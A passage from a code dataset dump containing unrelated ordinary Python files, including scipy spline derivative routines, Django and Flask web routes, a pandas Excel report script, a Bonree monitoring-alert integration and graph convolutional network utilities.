t[1:-k-1]\n dt = dt[sh]\n # Compute the new coefficients\n c = (c[1:-1-k] - c[:-2-k]) * k / dt\n # Pad coefficient array to same size as knots (FITPACK\n # convention)\n c = np.r_[c, np.zeros((k,) + c.shape[1:])]\n # Adjust knots\n t = t[1:-1]\n k -= 1\n except FloatingPointError as e:\n raise ValueError((\"The spline has internal repeated knots \"\n \"and is not differentiable %d times\") % n) from e\n\n return t, c, k\n\n\ndef splantider(tck, n=1):\n \"\"\"\n Compute the spline for the antiderivative (integral) of a given spline.\n\n Parameters\n ----------\n tck : tuple of (t, c, k)\n Spline whose antiderivative to compute\n n : int, optional\n Order of antiderivative to evaluate. Default: 1\n\n Returns\n -------\n tck_ader : tuple of (t2, c2, k2)\n Spline of order k2=k+n representing the antiderivative of the input\n spline.\n\n See Also\n --------\n splder, splev, spalde\n\n Notes\n -----\n The `splder` function is the inverse operation of this function.\n Namely, ``splder(splantider(tck))`` is identical to `tck`, modulo\n rounding error.\n\n .. versionadded:: 0.13.0\n\n Examples\n --------\n >>> from scipy.interpolate import splrep, splder, splantider, splev\n >>> x = np.linspace(0, np.pi/2, 70)\n >>> y = 1 / np.sqrt(1 - 0.8*np.sin(x)**2)\n >>> spl = splrep(x, y)\n\n The derivative is the inverse operation of the antiderivative,\n although some floating point error accumulates:\n\n >>> splev(1.7, spl), splev(1.7, splder(splantider(spl)))\n (array(2.1565429877197317), array(2.1565429877201865))\n\n Antiderivative can be used to evaluate definite integrals:\n\n >>> ispl = splantider(spl)\n >>> splev(np.pi/2, ispl) - splev(0, ispl)\n 2.2572053588768486\n\n This is indeed an approximation to the complete elliptic integral\n :math:`K(m) = \\\\int_0^{\\\\pi/2} [1 - m\\\\sin^2 x]^{-1/2} dx`:\n\n >>> from scipy.special import ellipk\n >>> ellipk(0.8)\n 2.2572053268208538\n\n \"\"\"\n if n < 0:\n return splder(tck, -n)\n\n t, c, k = tck\n\n # Extra axes for the trailing dims of the `c` array:\n sh = (slice(None),) + (None,)*len(c.shape[1:])\n\n for j in range(n):\n # This is the inverse set of operations to splder.\n\n # Compute the multiplier in the antiderivative formula.\n dt = t[k+1:] - t[:-k-1]\n dt = dt[sh]\n # Compute the new coefficients\n c = np.cumsum(c[:-k-1] * dt, axis=0) / (k + 1)\n c = np.r_[np.zeros((1,) + c.shape[1:]),\n c,\n [c[-1]] * (k+2)]\n # New knots\n t = np.r_[t[0], t, t[-1]]\n k += 1\n\n return t, c, k\n","sub_path":"contrib/python/scipy/py3/scipy/interpolate/_fitpack_impl.py","file_name":"_fitpack_impl.py","file_ext":"py","file_size_in_byte":46842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406917854","text":"import json, xmltodict\n\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n help =\"\"\"\n Accepts GPX file and converts to JSON object\n\n Needs more robust error handling and validation.\n \"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument('gpx_file', type=str)\n\n def handle(self, *args, **options):\n try:\n if options['gpx_file']:\n gpx_file = options['gpx_file']\n\n with open(gpx_file, 'r') as gpx:\n ride_dict = xmltodict.parse(gpx.read(), xml_attribs=True)\n return json.dumps(ride_dict, indent=4)\n except:\n raise\n","sub_path":"trail_tracker/trails/management/commands/parse_gpx.py","file_name":"parse_gpx.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271496455","text":"from django.conf.urls.defaults import *\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Example:\n # (r'^linky/', include('linky.foo.urls')),\n\n # Create a url\n url(r'^/?$', 'shorten.views.create', { 'template': 'shorten/create.html' }, name='shorten-create'),\n \n # Listing\n url(r'^/-/list/$', 'shorten.views.listing', { 'template': 'shorten/listing.html' }, name='shorten-listing'),\n \n # Lookup and redirect\n url(r'^(?P[-\\w]+)/$', 'shorten.views.lookup', name='shorten-lookup'),\n \n # Lookup and redirect\n url(r'^(?P[-\\w]+)/info/$', 'shorten.views.info', { 'template': 'shorten/info.html' }, name='shorten-info'),\n \n # Admin\n (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"64981583","text":"if REQUEST is not None:\n raise Unauthorized(\"Unauthorized call script from URL\")\n\nmodel_id = context.getWattConsumptionModel(\"no_model\")\n\n######\n# Introduce your Consumption Model here\n######\ndef consumption_model_shuttle_ds61_i7(load):\n \"\"\" Expected consumed watts for the computer load\n \"\"\"\n if load <= 25:\n return 21.5 + 1.06*load\n else:\n return 48 + 0.29*load\n\ndef consumption_model_shuttle_nuc_i7(load):\n \"\"\" Expected consumed watts for the computer load\n \"\"\"\n if load <= 25:\n return 8.5 + 0.46*load\n else:\n return 20 + 0.08*load\n\ndef consumption_model_rikomagic_mk802iv(load):\n \"\"\" Expected consumed watts for the computer load\n \"\"\"\n if load <= 25:\n return 2.2 + 0.04*load\n else:\n return 3.2 + 0.008*load\n\ndef no_model(load):\n return 0\n\nmodel_map = {\n \"shuttle_ds61_i7\" : consumption_model_shuttle_ds61_i7,\n \"rikomagic_mk802iv\": consumption_model_rikomagic_mk802iv,\n \"intel_nuc_i7\": consumption_model_shuttle_nuc_i7\n}\nif cpu_load_percentage is None:\n cpu_load_percentage = context.Computer_getLatestCPUPercentLoad()\n\ncpu_load_percentage += partition_increment\n\nreturn model_map.get(model_id, no_model)(cpu_load_percentage)\n","sub_path":"master/bt5/slapos_accounting/SkinTemplateItem/portal_skins/slapos_consumption/Computer_getWattConsumption.py","file_name":"Computer_getWattConsumption.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"218572472","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Author : rocky\r\n# Date : 2018-08-15 12:27:53 \r\n# Last Modified by : rocky\r\n# Last Modified time : 2018-08-15 12:27:53\r\n# Version :\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport sys\r\nimport os\r\n\r\ndef loadFile(path):\r\n \r\n df = pd.read_excel(path)\r\n\r\n df.rename(columns={'上线延期率(≤8%)': '计划上线天数', 'Unnamed: 17': '最终上线天数', 'Unnamed: 18': '上线延期率', '需求响应时效(≤12)': '需求响应时效', '开发效率(≥60%)': '开发时长', 'Unnamed: 21': '整个sit时间', 'Unnamed: 22': '开发效率', '测试效率(≤25.6%)': '测试时长', 'Unnamed: 24': '测试效率'}, inplace = True)\r\n\r\n\r\n df = df.drop([0])[['产品线', '系统名称', '需求响应时效', '开发时长', '测试时长', '总时长']]\r\n df[['需求响应时效', '开发时长', '测试时长', '总时长']] = df[['需求响应时效', '开发时长', '测试时长', '总时长']].astype(float)\r\n df['系统名称'] = df['系统名称'].apply(lambda x: str(x).strip())\r\n\r\n \r\n\r\n\r\n \r\n return df\r\n\r\ndef dataProcessing(df):\r\n grouped = df.groupby('系统名称')\r\n _a = grouped['需求响应时效'].mean()\r\n _b = grouped[['开发时长', '测试时长', '总时长']].sum()\r\n _c = grouped.size()\r\n\r\n \r\n r = pd.concat([_a, _b], axis=1)\r\n \r\n\r\n r.eval('开发效率 = 开发时长/总时长', inplace=True)\r\n r.eval('测试效率 = 测试时长/总时长', inplace=True)\r\n r['测试效率'] = r['测试效率'].apply(lambda x: format(x, '.2%')) \r\n r['开发效率'] = r['开发效率'].apply(lambda x: format(x, '.2%')) \r\n r = pd.concat([r, _c], axis=1)\r\n \r\n r.rename(columns={0: '功能更新效率'}, inplace = True)\r\n r['需求响应时效'] = r['需求响应时效'].apply(lambda x: format(x, '.2f')) \r\n r['开发时长'] = r['开发时长'].apply(lambda x: format(x, '.2f')) \r\n r['测试时长'] = r['测试时长'].apply(lambda x: format(x, '.2f')) \r\n r['总时长'] = r['总时长'].apply(lambda x: format(x, '.2f')) \r\n\r\n return r\r\n\r\ndef writeFile(df, dstPath):\r\n df.to_excel(r'xxx.xlsx')\r\n\r\ndef main():\r\n srcPath = r'../data/新过程质量数据监控模板.xlsx'\r\n dstPath = r'../data/tmp.xlsx'\r\n\r\n if len(sys.argv) != 3:\r\n print('Usage: python pyFileName ')\r\n else:\r\n\r\n srcPath = sys.argv[1]\r\n dstPath = sys.argv[2]\r\n print(dstPath)\r\n if os.path.exists(srcPath) and os.path.exists(dstPath):\r\n df = loadFile(srcPath)\r\n r = dataProcessing(df)\r\n writeFile(r, dstPath)\r\n else:\r\n print('the srcFile or dstDir is not exists')\r\n\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"pandas-learn/code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"88216018","text":"from __future__ import print_function\n\nimport scipy.sparse as sp\nimport numpy as np\nfrom scipy.sparse.linalg.eigen.arpack import eigsh, ArpackNoConvergence\n\n\n\"\"\"\ncoo_matrix: 这种悉数矩阵不能进行矩阵运算\ncsr_matrix: 可以进行矩阵运算\n csr_matrix((data, indices, indptr), [shape=(M, N)])\n is the standard CSR representation where the column indices for\n row i are stored in ``indices[indptr[i]:indptr[i+1]]`` and their\n corresponding values are stored in ``data[indptr[i]:indptr[i+1]]``.\n If the shape parameter is not supplied, the matrix dimensions\n are inferred from the index arrays.\n 它的典型的构造方式,data: 非零元素的值\n indices: data对应数据的column值\n indptr: 除了第一元素是0,其他的每个元素都是从上到下(row���向)非零元素\n 积累的个数\n\"\"\"\n\ndef encode_onehot(labels):\n # .content 文件的label 是一串英文字符,用 set 唯一化\n classes = set(labels)\n classes_dict = {c: np.identity(len(classes))[i, :] for i, c in enumerate(classes)}\n labels_onehot = np.array(list(map(classes_dict.get, labels)), dtype=np.int32)\n return labels_onehot\n\n\ndef load_data(path=\"data/cora/\", dataset=\"cora\"):\n \"\"\"Load citation network dataset (cora only for now)\"\"\"\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset), dtype=np.dtype(str))\n # 特征从第一列一直到最后一列\n # 提取样本的特征,用csr矩阵(压缩系数矩阵),用行索引、列索引、值来代表原有的密度矩阵\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n # .content 文件每行的最后一个列就是label,是 英文字符串\n labels = encode_onehot(idx_features_labels[:, -1])\n\n # build graph\n # 样本的 id ,在第一列, id是乱序的整数\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n # 样本的 id 到 index 索引 的字典映射\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset), dtype=np.int32)\n # 使得 node 的 id 的索引是从 0 开始,逐渐增加\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n # 构建图的邻接矩阵,用坐标形式的稀疏矩阵表示,非对称邻接矩阵\n # sp.coo_matrix((data, (row, col)), shape, dtype)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]), dtype=np.float32)\n\n # build symmetric adjacency matrix\n # 将非对称的邻接矩阵转换成对称的邻接矩阵\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n # 打印消息:数据集有多少个节点、多少条边、每个样本有多少维特征\n print('Dataset has {} nodes, {} edges, {} features.'.format(adj.shape[0], edges.shape[0], features.shape[1]))\n\n return features.todense(), adj, labels\n\n\n# 对邻接矩阵进行归一化处理\ndef normalize_adj(adj, symmetric=True):\n # 如果是对称的,得到对称归一化邻接矩阵\n # D^(-1/2) * A * D^(-1/2)\n if symmetric:\n # A.sum(1), 求出每个节点的度,计算每行元素之和,得到节点的度矩阵 D\n # np.power(A, -0.5) 在经过 flatten 得到一维度的D^-1/2\n # sp.diags(A, offset=0) offest 就是这个中心对称轴的数据的偏移量,A是一维向量\n d = sp.diags(np.power(np.array(adj.sum(1)), -0.5).flatten(), offsets=0)\n # tocsr() 将矩阵转换为压缩稀疏矩阵\n a_norm = adj.dot(d).transpose().dot(d).tocsr() # ?为什么跟公式不一样\n else:\n # 如果邻接矩阵不是对称矩阵,得到随机游走正则化拉普拉斯算子\n # D^(-1) * A\n d = sp.diags(np.power(np.array(adj.sum(1)), -1).flatten(), 0)\n a_norm = d.dot(adj).tocsr()\n return a_norm\n\n\ndef preprocess_adj(adj, symmetric=True):\n # 在邻接矩阵中加入自连接\n adj = adj + sp.eye(adj.shape[0])\n # 对加入之连接的矩阵进行归一化处理\n adj = normalize_adj(adj, symmetric)\n return adj\n\n\ndef sample_mask(idx, l):\n \"\"\"\n # 构造样本掩码,mask掉return 索引上为False的样本\n :param idx: 有标签的样本索引\n :param l: 所有样本的长度\n :return: 布尔类型的数组,其中有标签的位置为True,无标签的位置为False\n \"\"\"\n mask = np.zeros(l)\n mask[idx] = 1\n return np.array(mask, dtype=np.bool)\n\n\ndef get_splits(y):\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n y_train = np.zeros(y.shape, dtype=np.int32)\n y_val = np.zeros(y.shape, dtype=np.int32)\n y_test = np.zeros(y.shape, dtype=np.int32)\n y_train[idx_train] = y[idx_train]\n y_val[idx_val] = y[idx_val]\n y_test[idx_test] = y[idx_test]\n train_mask = sample_mask(idx_train, y.shape[0])\n return y_train, y_val, y_test, idx_train, idx_val, idx_test, train_mask\n\n\ndef categorical_crossentropy(preds, labels):\n \"\"\"\n 定义分类交叉熵\n :param preds: 模型输出的数组\n :param labels: one-hot 编码的label标签\n :return: 样本的平均交叉熵损失\n \"\"\"\n # np.extract(condition, arr)\n # np.mean() 默认求数组中所有数的均值\n # 这里的 labels 就是这里的 condition\n # 如果condition是一个bool数组,那么这个相当于 arr[condition]\n return np.mean(-np.log(np.extract(labels, preds)))\n\n\ndef accuracy(preds, labels):\n # 定义准确率函数\n # np.argmax(arr, axis), 输出指定 axis轴上的最大值的索引\n # np.equal(x1, x2) 逐元素对比是否相等,相等返回True,否则返回False,是 np.bool 型的变量\n return np.mean(np.equal(np.argmax(labels, 1), np.argmax(preds, 1)))\n\n\ndef evaluate_preds(preds, labels, indices):\n \"\"\"\n 评估样本划分的损失函数和准确率\n :param preds:对于样本的预测值\n :param labels:样本的标签one-hot向量\n :param indices:样本的索引集合\n :return:交叉熵损失函数列表、准确率列表\n \"\"\"\n split_loss = list()\n split_acc = list()\n\n for y_split, idx_split in zip(labels, indices):\n # 计算每一个样本的交叉熵损失函数\n split_loss.append(categorical_crossentropy(preds[idx_split], y_split[idx_split]))\n # 计算每一个样本的准确率\n split_acc.append(accuracy(preds[idx_split], y_split[idx_split]))\n\n return split_loss, split_acc\n\n\ndef normalized_laplacian(adj, symmetric=True):\n # 对拉普拉斯矩阵进行归一化处理\n # 对称归一化的邻接矩阵,D ^ (-1/2) * A * D ^ (-1/2)\n adj_normalized = normalize_adj(adj, symmetric)\n # 得到对称规范化的图拉普拉斯矩阵,L = I - D ^ (-1/2) * A * D ^ (-1/2)\n laplacian = sp.eye(adj.shape[0]) - adj_normalized\n return laplacian\n\n\ndef rescale_laplacian(laplacian):\n # 得到对称规范化的图拉普拉斯矩阵,L = I - D ^ (-1/2) * A * D ^ (-1/2)\n try:\n print('Calculating largest eigenvalue of normalized graph Laplacian...')\n # 计算归一化后的图拉普拉斯矩阵的最大特征值\n # Find k eigenvalues and eigenvectors of the real symmetric square matrix or complex hermitian matrix A.\n largest_eigval = eigsh(laplacian, 1, which='LM', return_eigenvectors=False)[0]\n except ArpackNoConvergence:\n # 如果计算过程不收敛,最大特征值用 2 代替\n print('Eigenvalue calculation did not converge! Using largest_eigval=2 instead.')\n largest_eigval = 2\n\n # 调整后的对称归一化图拉普拉斯矩阵,L~ = 2 / Lambda * L - I\n scaled_laplacian = (2. / largest_eigval) * laplacian - sp.eye(laplacian.shape[0])\n return scaled_laplacian\n\n\ndef chebyshev_polynomial(X, k):\n # 返回一个稀疏矩阵列表\n \"\"\"Calculate Chebyshev polynomials up to order k. Return a list of sparse matrices.\"\"\"\n # 计算直到k阶的切比雪夫多项式\n print(\"Calculating Chebyshev polynomials up to order {}...\".format(k))\n\n T_k = list()\n T_k.append(sp.eye(X.shape[0]).tocsr()) # T0(X) = I\n T_k.append(X) # T1(X) = L~\n\n # 定义切比雪夫递归公式\n def chebyshev_recurrence(T_k_minus_one, T_k_minus_two, X):\n \"\"\"\n :param T_k_minus_one: T(k-1)(L~)\n :param T_k_minus_two: T(k-2)(L~)\n :param X: L~\n :return: Tk(L~)\n \"\"\"\n # 将输入转化为csr矩阵(压缩稀疏行矩阵)\n X_ = sp.csr_matrix(X, copy=True)\n # 递归公式:Tk(L~) = 2L~ * T(k-1)(L~) - T(k-2)(L~)\n return 2 * X_.dot(T_k_minus_one) - T_k_minus_two\n\n for i in range(2, k+1):\n T_k.append(chebyshev_recurrence(T_k[-1], T_k[-2], X))\n\n # 返回切比雪夫多项式列表\n return T_k\n\n\ndef sparse_to_tuple(sparse_mx):\n # 将稀疏矩阵转化为元组表示\n if not sp.isspmatrix_coo(sparse_mx):\n # 将稀疏矩阵转化为coo矩阵形式\n # coo矩阵采用三个数组分别存储行、列和非零元素值的信息\n sparse_mx = sparse_mx.tocoo()\n # np.vstack()函数沿着数组的某条轴堆叠数组\n # 获取非零元素的位置索引\n coords = np.vstack((sparse_mx.row, sparse_mx.col)).transpose()\n # 获得矩阵非零元素的值\n values = sparse_mx.data\n shape = sparse_mx.shape\n return coords, values, shape\n","sub_path":"kegra/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"410753261","text":"import logging\nimport kiteSettings\nfrom kiteconnect import KiteConnect\n\nlogging.basicConfig(level=logging.DEBUG)\n\nkite = KiteConnect(kiteSettings.api_key)\n\n# https://kite.zerodha.com/connect/login?v=4&api_key=Q8JPzjkt8ftXgqvmXa\n\nrequest_token = input(\"Request Token: \")\ndata = kite.generate_session(request_token, kiteSettings.api_secret)\nkite.set_access_token(data[\"access_token\"])\n\nprint(\"====================\")\nprint(\"Access Token: \",data[\"access_token\"])\n","sub_path":"KITEE/kiteGetAccessToken.py","file_name":"kiteGetAccessToken.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"164769981","text":"from flask import render_template, redirect, url_for, request, flash\nfrom flask_login import login_required, current_user\nfrom application.lists.forms import ListForm, AddItemForm, UpdateListItem\nfrom application.main.models import User, List, Item\nfrom application.lists import bp_lists\nfrom application import db\n\n# list related routes\n\n@bp_lists.route('/create_list', methods=['GET', 'POST'])\n@login_required\ndef create_list():\n form = ListForm()\n if form.validate_on_submit():\n new_list = List(name=form.name.data, owner=current_user)\n db.session.add(new_list)\n db.session.commit()\n flash('Your list is now live!')\n return redirect(url_for('main.index'))\n return render_template('lists/create.html', form=form)\n\n@bp_lists.route('/prep_list/', methods=['GET','POST'])\n@login_required\ndef prep_list(list_id):\n p_list = List.query.filter_by(id=list_id).first_or_404()\n #check if list exists\n if p_list is None:\n return redirect(url_for('main.index'))\n #create form and validate\n form = None\n #check if current_user is the owner of the list\n if current_user.id == p_list.user_id:\n form = AddItemForm()\n if form.validate_on_submit():\n new_item = Item(name=form.name.data,\n description=form.description.data,\n status=form.status.data)\n p_list.add_item(new_item)\n db.session.commit()\n return redirect(url_for('lists.prep_list', list_id=p_list.id))\n return render_template('lists/list.html', p_list=p_list, form=form)\n\n@bp_lists.route('/update_item/', methods=['GET', 'POST'])\n@login_required\ndef update_item(item_id):\n item = Item.query.filter_by(id=item_id).first_or_404()\n\n #check if user is authorized update the item\n\n #check if item exists\n if item is None:\n return redirect(url_for('main.index'))\n \n #create form to update list\n form = UpdateListItem()\n if form.validate_on_submit():\n item.update_status(form.status.data)\n db.session.commit()\n return redirect(url_for('lists.prep_list', list_id=item.list.id))\n return render_template('lists/update_item.html', form=form, item=item)\n\n@bp_lists.route('/delete_item/', methods=['GET', 'POST'])\n@login_required\ndef delete_item(item_id):\n item = Item.query.filter_by(id=item_id).first_or_404()\n \n #check if item exists\n if item is None:\n return redirect(url_for('main.index'))\n \n #delete item\n mylist = item.list\n mylist.remove_item(item)\n db.session.delete(item)\n db.session.commit()\n return redirect(url_for('lists.prep_list', list_id=mylist.id))\n\n","sub_path":"application/lists/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"198967606","text":"# coding=utf-8\nimport json\nimport urllib\nfrom django.views.decorators.csrf import csrf_exempt\nimport pytz\nimport datetime\nfrom django.conf import settings\nfrom bonree_task.bonree_client import BonreeClient\nfrom meta.models import Alert\nfrom tools.api_tool import api_except, log_params, json_response\nfrom meta.models import AlertDefine\nfrom meta.handler import CallbackHandler\nfrom tools.log_tool import get_logger\nfrom cmdb_ops_client.ops_client import query_first_instance_data, query_all_instance_data, \\\n query_first_relation_instance, query_all_view_datas\n\nlogger = get_logger()\n\nALERT_DEFINE = None\n\n\ndef init_alert_define():\n alert_defines = AlertDefine.objects.filter(name=\"Bonree告警\", severity=AlertDefine.HIGH, nature=AlertDefine.ADAC)\n if not alert_defines:\n alert_define = AlertDefine()\n alert_define.name = \"Bonree告警\"\n alert_define.desc = \"自动生成定义:Bonree告警\"\n alert_define.nature = AlertDefine.ADAC\n alert_define.severity = AlertDefine.HIGH\n alert_define.enabled = True\n alert_define.save()\n else:\n alert_define = alert_defines.first()\n\n global ALERT_DEFINE\n ALERT_DEFINE = alert_define\n\n\ninit_alert_define()\n\n\ndef domain_part_from_url(url):\n \"\"\"\n 用url中截取出域名部分\n :param url:\n :return:\n \"\"\"\n proto, rest = urllib.splittype(url)\n if proto is None:\n rest = '//' + rest\n domain, rest = urllib.splithost(rest)\n domain = domain.split(':')[0]\n return domain\n\n\ndef resolve_detail_log(alert_info):\n \"\"\"\n 解析博睿告警日详细日志。日志样例见最后注释部分。\n :param alert_info:\n :return:\n \"\"\"\n role_url = alert_info.get('role_url', '')\n alert_type = alert_info.get('alert_type')\n msg = '[测试url]:{url}\\n未获取到详细信息'.format(url=role_url)\n try:\n # 根据不同的告警类型做日志解析以获取详细信息\n log_detail_str = alert_info['log_detail']\n log_detail_str = log_detail_str[log_detail_str.index('{'):]\n json_detail = json.loads(log_detail_str)\n\n if alert_type == 2:\n headers = json_detail['statisJson']['header']\n dataArr = json_detail['statisJson']['dataArr']\n msg = '[测试url]:{url}\\n'.format(url=role_url)\n msg += '[alert_name]:{alert_name}\\n'.format(alert_name=alert_info.get('alert_name'))\n for header in headers:\n msg += '[{text}]:{value}\\n'.format(text=header['text'], value=dataArr[0][header['value']])\n else:\n header = json_detail['total']['header'][0]\n header_text = header['text'] # 监控项名称\n header_value = header['value'] # 监控项变量名\n header_dw = header['dw'] # 监控项单位\n data = json_detail['total']['dataArr'][0]\n factor_value = data[header_value]\n alert_count = data['BAOJINGCOUNT']\n total_count = data['SUOYOUCOUNT']\n msg = '{alert_name}\\n{url}\\n{alert_count}/{total_count}\\n{header_text} {factor_value}{header_dw}'.format(\n alert_name=alert_info.get('alert_name'), url=role_url, alert_count=alert_count, total_count=total_count,\n header_text=header_text, factor_value=factor_value, header_dw=header_dw\n )\n except Exception as e:\n logger.exception('get alert detail msg failed. Exception:%s' % str(e))\n return msg\n\n\nclass BonreeAlertHandler(CallbackHandler):\n \"\"\"\n Bonree告警接入适配器\n \"\"\"\n\n def __init__(self, alert_info):\n self.alert_info = alert_info\n super(BonreeAlertHandler, self).__init__(None)\n\n def process_data(self):\n info = self.alert_info\n\n # 从博睿告警任务监测测url中截取出域名部分\n role_url = info.get('role_url')\n domain = domain_part_from_url(role_url)\n domain_parts = domain.split('.')\n # 把域名划分为三级及以上子域名,一二级域名两部分\n sub_domain = '.'.join(domain_parts[:-2])\n second_domain = '.'.join(domain_parts[-2:])\n\n # 在cmdb中查询匹配的域名信息\n matched_sub_domain = None\n sub_domain_instances = query_all_instance_data('SubDomain', filter_string='.filter(name=\"%s\")' % sub_domain)\n for sub_domain_instance in sub_domain_instances:\n relation = query_first_relation_instance('SubDomain_DNSPodDomain_Relation',\n filter_string='.filter(source_Instance_Id=%s)' %\n sub_domain_instance['id'])\n if relation:\n dnspod_domain = query_first_instance_data('DNSPodDomain', filter_string='.filter(id=%s)' % relation[\n 'target_Instance_Id'])\n if dnspod_domain['name'] == second_domain:\n matched_sub_domain = sub_domain_instance\n break\n\n # 如果有匹配的域名,则告警的归属业务为域名的业务。如果没有匹配的域名,则告警的业务默认为network\n scope_name = ''\n if matched_sub_domain:\n scopes = query_all_view_datas('SubDomainListView',\n filter_string='.filter(id=%s)' % matched_sub_domain['id'],\n contentSelector=['scope_name'])\n scope_name = ','.join([scope['scope_name'] for scope in scopes])\n scope_name = scope_name or 'network'\n\n # 获取详情\n if info.get('log_detail'):\n msg = resolve_detail_log(info)\n else:\n msg = info.get('alert_name')\n\n self._alert_info_dict['define'] = ALERT_DEFINE\n self._alert_info_dict['src_id'] = info.get('alert_id')\n self._alert_info_dict['status'] = info.get('status')\n self._alert_info_dict['obj_id'] = matched_sub_domain['id'] if matched_sub_domain else None\n self._alert_info_dict['obj_name'] = info.get('alert_name')\n self._alert_info_dict['msg'] = msg\n self._alert_info_dict['scope'] = scope_name\n self._alert_info_dict['sub_type'] = '网络'\n\n\n@csrf_exempt\n@api_except\n@log_params\ndef callback_bonree(request):\n try:\n datetime_format_pattern = '%Y-%m-%d %H:%M:%S'\n tz = pytz.timezone(pytz.country_timezones('cn')[0])\n now = datetime.datetime.now(tz)\n start = (now - datetime.timedelta(minutes=int(settings.DETECT_BONREE_INTERVAL) + 1)).strftime(\n datetime_format_pattern)\n end = now.strftime(datetime_format_pattern)\n c = BonreeClient()\n status, role_list = c.get_task_list()\n if not status:\n logger.exception('get role list from Bonree failed.')\n return\n role_dict = {role['ROLE_ID']: role for role in role_list}\n\n status, alert_list = c.get_alert_list()\n if not status:\n logger.exception('get alert list from Bonree failed.')\n return\n alert_dict = {alert['alert_id']: alert for alert in alert_list}\n\n status, log_list = c.get_alertlog_list(start, end)\n if not status:\n logger.exception('get alertlog list from Bonree failed.')\n return\n logger.info('Detected {num} alerts.'.format(num=len(log_list)))\n\n problem_alert_ids = []\n # 检测到问题的报警\n alert_list = Alert.objects.filter(status=Alert.PROBLEM)\n alert_src_id_list = []\n for alert in alert_list:\n alert_src_id_list.append(alert.src_id)\n for log in log_list:\n try:\n alert_id = log.get('LOG.alert_id')\n problem_alert_ids.append(alert_id)\n\n alert = alert_dict[alert_id]\n alert_name = alert['alertname']\n alert_type = alert['alert_type']\n alert_level = log.get('LOG.alert_level')\n role_id = log.get('LOG.role_id')\n role = role_dict[str(role_id)]\n role_creator = role.get('TRUENAME')\n role_url = role.get('URL')\n\n # 忽略指定账户创建的任务\n if role_creator in settings.BONREE_IGNORE_ACCOUNT:\n continue\n\n # 有已经存在的重复告警则跳过\n if str(alert_id) in alert_src_id_list:\n continue\n\n status, detail = c.get_log_detail(log['URL'], alert_type)\n\n alert_info = {\n 'alert_id': alert_id,\n 'alert_name': alert_name,\n 'alert_type': alert_type,\n 'alert_level': alert_level,\n 'role_url': role_url,\n 'status': Alert.PROBLEM,\n 'detect_time': datetime.datetime.now(),\n 'log_detail': detail\n }\n\n logger.info('detect new bonree alert problem: %s' % str(alert_info))\n handler = BonreeAlertHandler(alert_info)\n handler.alert_action()\n except Exception as e:\n logger.exception('get bonree alert info from log failed. Exception:%s' % str(e))\n\n # 恢复的报警\n ok_alert_list = [v for k, v in alert_dict.items() if k not in problem_alert_ids]\n\n for alert in ok_alert_list:\n # 如果有需要清除的告警则修改告警状态\n if str(alert.get('alert_id')) in alert_src_id_list:\n alerting = Alert.objects.filter(src_id=str(alert.get('alert_id'))).all()\n if not alerting:\n logger.warn('Get clean alert but no problem alert.')\n for ale in alerting:\n if ale.status == Alert.PROBLEM:\n ale.t_clean()\n except Exception as e:\n logger.error(\"同步博瑞告警失败:\" + str(e), exc_info=True)\n return json_response({'status': -1, 'error': '同步博瑞告警失败.'})\n\n return json_response({'status': 0})\n","sub_path":"WiseEyeAlertService/bonree_task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"369052210","text":"# -*- mode: python; coding: utf-8 -*-\n# Copyright 2019-2021 the .NET Foundation\n# Licensed under the MIT License.\n\nfrom __future__ import absolute_import, division, print_function\n\n__all__ = \"\"\"\nFolder\nfetch_folder_tree\nmake_absolutizing_url_mutator\nmake_filesystem_url_mutator\nwalk_cached_folder_tree\n\"\"\".split()\n\nimport os.path\nimport re\nimport requests\nfrom traitlets import Bool, Instance, Int, List, Unicode, Union, UseEnum\nfrom xml.etree import ElementTree as etree\n\nfrom . import LockedXmlTraits, XmlSer\nfrom .abcs import UrlContainer\nfrom .enums import FolderType\n\n\nclass Folder(LockedXmlTraits, UrlContainer):\n \"\"\"A grouping of WWT content assets.\n\n Children can be: places (aka \"Items\"), imagesets, linesets, tours,\n folders, or IThumbnail objects (to be explored).\n\n \"\"\"\n\n name = Unicode(\"\").tag(xml=XmlSer.attr(\"Name\"))\n group = 